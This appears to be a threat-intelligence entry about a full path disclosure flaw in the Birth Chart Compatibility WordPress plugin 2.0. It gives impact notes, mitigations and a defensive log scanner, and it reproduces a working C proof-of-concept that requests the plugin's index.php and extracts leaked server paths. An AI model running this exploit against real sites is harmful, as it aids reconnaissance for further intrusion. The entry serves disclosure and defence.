Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
AI Analysis
Technical Summary
The Birth Chart Compatibility WordPress Plugin version 2.0 suffers from a full path disclosure vulnerability. This type of vulnerability occurs when an application reveals the absolute file system path of the web server or application files in error messages or responses. Attackers can use this information to map the server's directory structure, identify the location of sensitive files, and tailor further attacks such as local file inclusion, remote code execution, or privilege escalation. The vulnerability affects the plugin's handling of certain requests or errors, causing it to leak the full path. The exploit code published on Exploit-DB is written in C, suggesting a standalone tool that can be used to automate the discovery of vulnerable installations. No specific affected versions are listed, but the reference to version 2.0 indicates that this version is vulnerable. No patches or fixes are currently linked, implying that users must seek updates or workarounds from the plugin developer or community. The vulnerability does not require authentication or user interaction, allowing remote attackers to exploit it easily. While the direct impact is limited to information disclosure, this can be a critical step in a multi-stage attack chain. Organizations using this plugin should be aware of the risk and monitor for suspicious activity.
Potential Impact
For European organizations, this vulnerability poses a moderate risk primarily through the exposure of sensitive server path information. While it does not directly allow code execution or data modification, the disclosed paths can facilitate more severe attacks by providing attackers with detailed knowledge of the server environment. This can lead to targeted exploitation attempts such as local file inclusion, directory traversal, or privilege escalation. Organizations operating WordPress sites with this plugin, especially those handling sensitive customer data or critical business functions, may face increased risk of data breaches or service disruptions if attackers leverage this information. The ease of exploitation without authentication increases the threat level, particularly for publicly accessible websites. Additionally, the presence of exploit code in C may enable attackers to integrate this vulnerability into automated scanning tools, increasing the likelihood of widespread probing and exploitation attempts. The impact is compounded in sectors with high regulatory requirements for data protection, such as finance, healthcare, and e-commerce, common across Europe.
Mitigation Recommendations
European organizations should immediately identify if their WordPress installations use the Birth Chart Compatibility Plugin version 2.0. If so, they should seek updates or patches from the plugin developer or community forums. In the absence of an official patch, consider disabling or removing the plugin to eliminate the vulnerability. Web application firewalls (WAFs) can be configured to detect and block requests that trigger the full path disclosure. Additionally, error handling should be hardened to prevent detailed error messages from being displayed to users, including disabling debug modes and customizing error responses. Regular security audits and vulnerability scanning should include checks for this specific vulnerability. Organizations should also monitor web server logs for unusual requests targeting the plugin endpoints. Employing least privilege principles on the web server and isolating WordPress instances can reduce the impact of potential follow-up attacks. Finally, educating web administrators about the risks of information disclosure vulnerabilities will help maintain vigilance.
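The log-monitoring and error-hardening checks described above can be scripted. This is an added example, not part of the original entry or the plugin: it assumes Combined Log Format access logs, takes the plugin path from the PoC published in this entry, and runs on constructed log lines and a constructed PHP error body.

```python
import re
from collections import defaultdict

# Plugin directory as requested by the PoC in this entry.
PLUGIN_DIR = "/wp-content/plugins/birth-chart-compatibility/"

# Assumed Combined Log Format: ip ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3})\b'
)

# PHP error text that embeds an absolute Unix or Windows path to a .php file.
LEAK_RE = re.compile(
    r'(?:Warning|Fatal error|Notice|Parse error)\b.*?\bin\s+(?:<b>)?'
    r'(?P<path>(?:/|[A-Za-z]:\\)[^<\s]+\.php)', re.S)

def direct_plugin_hits(lines):
    """Group direct requests to the plugin's PHP files by client IP."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        path = m["path"].split("?", 1)[0].lower()
        if path.startswith(PLUGIN_DIR) and path.endswith(".php"):
            hits[m["ip"]].append((m["ts"], m["path"], int(m["status"])))
    return dict(hits)

def leaked_path(body):
    """Return the absolute path exposed in a PHP error message, or None."""
    m = LEAK_RE.search(body)
    return m["path"] if m else None

# Constructed samples (documentation IP ranges, invented error text).
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Aug/2025:01:20:11 +0000] "GET /wp-content/plugins/birth-chart-compatibility/index.php HTTP/1.1" 200 412 "http://example.com" "curl/8.5.0"',
    '198.51.100.4 - - [27/Aug/2025:01:21:02 +0000] "GET /wp-content/plugins/birth-chart-compatibility/css/style.css HTTP/1.1" 200 1900 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [27/Aug/2025:01:20:13 +0000] "GET /wp-content/plugins/birth-chart-compatibility/index.php HTTP/1.1" 200 412 "http://example.com" "curl/8.5.0"',
]
SAMPLE_BODY = ("<b>Fatal error</b>: Uncaught Error: Call to undefined function "
               "add_action() in /var/www/html/wp-content/plugins/"
               "birth-chart-compatibility/index.php:12")

if __name__ == "__main__":
    for ip, reqs in direct_plugin_hits(SAMPLE_LOG).items():
        print(ip, len(reqs), "direct plugin PHP requests", [s for _, _, s in reqs])
    print("leaked path:", leaked_path(SAMPLE_BODY))
```

Run `leaked_path` against your own site's response for the plugin URL after disabling error display; a `None` result means the response no longer exposes a path.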
Affected Countries
Germany, United Kingdom, France, Netherlands, Italy, Spain, Poland, Sweden
Indicators of Compromise
- exploit-code:

    /*
     * Exploit Title : Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
     * Author : Byte Reaper
     * Telegram : @ByteReaper0
     * CVE : CVE-2025-6082
     * Software Link : https://frp.wordpress.org/plugins/birth-chart-compatibility/
     * Description : Proof‑of‑Concept exploits the Full Path Disclosure bug in the
     * “Birth Chart Compatibility” WordPress plugin (<=v2.0). It sends
     * an HTTP GET request to the plugin’s index.php endpoint, captures
     * the resulting PHP warning or fatal error, and parses the server’s
     * filesystem path (e.g. “/var/www/html/wp-content/plugins/…” or
     * “C:\\xampp\\htdocs\\…”). Revealing this path aids attackers in
     * chaining further LFI/RCE or reconnaissance attacks.
     */
    #include <stdio.h>
    #include "argparse.h"
    #include <string.h>
    #include <stdlib.h>
    #include <curl/curl.h>
    #include <unistd.h>

    #define FULL 2300

    const char *url = NULL;
    const char *cookies = NULL;
    int selecetCookie = 0;
    int verbose = 0;

    /* Terminate the process with exit(0) through a raw x86-64 Linux syscall. */
    void exitSyscall()
    {
        __asm__ volatile
        (
            "xor %%rdi, %%rdi\n\t"
            "mov $0x3C, %%rax\n\t"
            "syscall\n\t"
            :
            :
            : "rax", "rdi"
        );
    }

    /* Strings whose presence in the response indicates a disclosed path. */
    const char *keyFound[] =
    {
        "Warning:",
        "Fatal error:",
        "/var/www/",
        "C:\\xampp\\"
    };

    struct Mem
    {
        char *buffer;
        size_t len;
    };

    /* libcurl write callback: append each chunk to a growing, NUL-terminated buffer. */
    size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
    {
        size_t total = size * nmemb;
        struct Mem *m = (struct Mem *)userdata;
        char *tmp = realloc(m->buffer, m->len + total + 1);
        if (tmp == NULL)
        {
            printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n");
            exitSyscall();
        }
        m->buffer = tmp;
        memcpy(&(m->buffer[m->len]), ptr, total);
        m->len += total;
        m->buffer[m->len] = '\0';
        return total;
    }

    void showPath(const char *targetUrl)
    {
        char full[FULL];
        CURLcode curlCode;
        struct Mem response = {NULL, 0};
        CURL *curl = curl_easy_init();
        if (curl == NULL)
        {
            exitSyscall();
        }
        response.buffer = NULL;
        response.len = 0;
        if (verbose)
        {
            printf("==========================================\e[0m\n");
            printf("[+] Cleaning Response...\e[0m\n");
            /* The buffer is still NULL here; never pass NULL to %s. */
            printf("[+] Response Buffer : %s\e[0m\n", response.buffer ? response.buffer : "(null)");
            printf("[+] Response Len : %zu\e[0m\n", response.len);
            printf("==========================================\e[0m\n");
        }
        fflush(stdout);
        if (curl)
        {
            snprintf(full, sizeof(full), "%s/wp-content/plugins/birth-chart-compatibility/index.php", targetUrl);
            curl_easy_setopt(curl, CURLOPT_URL, full);
            if (selecetCookie)
            {
                curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies);
                curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies);
            }
            curl_easy_setopt(curl, CURLOPT_ACCEPT_ENCODING, "");
            curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
            sleep(1);
            curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb);
            curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response);
            curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L);
            curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L);
            curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
            curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
            if (verbose)
            {
                printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n");
                curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
            }
            struct curl_slist *h = NULL;
            h = curl_slist_append(h, "Accept: text/html");
            h = curl_slist_append(h, "Accept-Encoding: gzip");
            h = curl_slist_append(h, "Accept-Language: en-US,en");
            h = curl_slist_append(h, "Connection: keep-alive");
            h = curl_slist_append(h, "Referer: http://example.com");
            curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h);
            long httpCode = 0;
            curlCode = curl_easy_perform(curl);
            if (curlCode == CURLE_OK)
            {
                /* An empty body leaves the buffer NULL; use "" so printf/strstr stay defined. */
                const char *body = response.buffer ? response.buffer : "";
                printf("---------------------------------------------------------------------------------------\n");
                printf("\e[1;36m[+] Request sent successfully\e[0m\n");
                printf("\e[1;33m[+] Input Url : %s\e[0m\n", targetUrl);
                printf("\e[1;33m[+] Full Format Url : %s\e[0m\n", full);
                curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode);
                int numberKey = sizeof(keyFound) / sizeof(keyFound[0]);
                if (httpCode >= 200 && httpCode < 300)
                {
                    printf("[+] Http Code (200 < 300) !\e[0m\n");
                    printf("\e[1;32m[+] Http Code : %ld\e[0m\n", httpCode);
                    printf("\e[1;35m====================================[Response]====================================\e[0m\n");
                    printf("%s\n", body);
                    printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len);
                    printf("\e[1;35m===================================================================================\e[0m\n\n");
                    for (int k = 0; k < numberKey; k++)
                    {
                        const char *found = strstr(body, keyFound[k]);
                        if (found)
                        {
                            printf("\e[1;34m[+] Keyword found: %s\e[0m\n", keyFound[k]);
                            printf("\e[1;34m[+] Context: %.100s\e[0m\n", found);
                        }
                    }
                }
                else
                {
                    printf("\e[1;31m[-] Http Code : %ld\e[0m\n", httpCode);
                    printf("\e[1;31m[-] Please Check Your input Path !\e[0m\n");
                    printf("\e[1;31m[-] Or Connection in Tragte : (%s)\e[0m\n", targetUrl);
                    if (verbose)
                    {
                        printf("\e[1;35m====================================[Response]====================================\n");
                        printf("%s\n", body);
                        printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len);
                        printf("\e[1;35m===================================================================================\n\n");
                    }
                }
            }
            else
            {
                printf("\e[1;31m[-] The request was not sent !\e[0m\n");
                if (verbose)
                {
                    printf("\e[1;31m[-] Exit Syscall ...\e[0m\n");
                }
                printf("\e[1;31m[-] Error : %s\n", curl_easy_strerror(curlCode));
                exitSyscall();
            }
            /* Release the custom header list once the transfer is done. */
            curl_slist_free_all(h);
        }
        if (response.buffer)
        {
            free(response.buffer);
            response.buffer = NULL;
            response.len = 0;
        }
        curl_easy_cleanup(curl);
    }

    int main(int argc, const char **argv)
    {
        printf
        (
            "\e[1;91m"
            "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖ \n"
            "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▙▖▛▌▙▌▄▌ \n"
            "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▙▌█▌▙▌▙▖ \n"
            "\e[1;97m\t Byte Reaper\e[0m\n"
        );
        printf("\e[1;91m---------------------------------------------------------------------------------------\e[0m\n");
        int loop = 0;
        struct argparse_option options[] =
        {
            OPT_HELP(),
            OPT_STRING('u', "url", &url, "Target Url (Base Url)"),
            OPT_STRING('c', "cookies", &cookies, "cookies File"),
            OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"),
            OPT_INTEGER('f', "loop", &loop, "For loop (Request) (Ex : -f 10)"),
            OPT_END(),
        };
        struct argparse argparse;
        argparse_init(&argparse, options, NULL, 0);
        argparse_parse(&argparse, argc, argv);
        if (!url)
        {
            printf("\e[1;31m[-] Please Enter Target Url !\e[0m\n");
            printf("\e[1;31m[-] Ex : ./exploit -u https://target.com\e[0m\n");
            exitSyscall();
        }
        if (verbose)
        {
            verbose = 1;
        }
        if (cookies)
        {
            selecetCookie = 1;
        }
        if (loop)
        {
            for (int o = 0; o < loop; o++)
            {
                showPath(url);
            }
        }
        showPath(url);
        return 0;
    }
Technical Details
- Edb Id: 52419
- Has Exploit Code: true
- Code Language: c
Threat ID: 68ae5e7aad5a09ad005d88ca
Added to database: 8/27/2025, 1:25:14 AM
Last enriched: 10/11/2025, 1:01:14 AM
Last updated: 10/16/2025, 8:20:28 AM